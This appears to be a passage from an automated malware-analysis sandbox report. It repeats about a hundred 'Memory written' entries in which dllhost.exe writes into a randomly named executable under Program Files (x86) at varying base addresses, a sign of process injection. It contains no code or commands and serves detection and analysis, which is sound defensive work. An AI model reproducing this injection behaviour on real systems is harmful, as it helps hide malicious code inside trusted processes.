Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: ED0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1240000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1210000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 620000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 630000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 920000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1170000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1030000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1050000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1170000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 630000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1430000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 680000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1280000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 12A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 520000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 8D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 8F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1040000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1400000
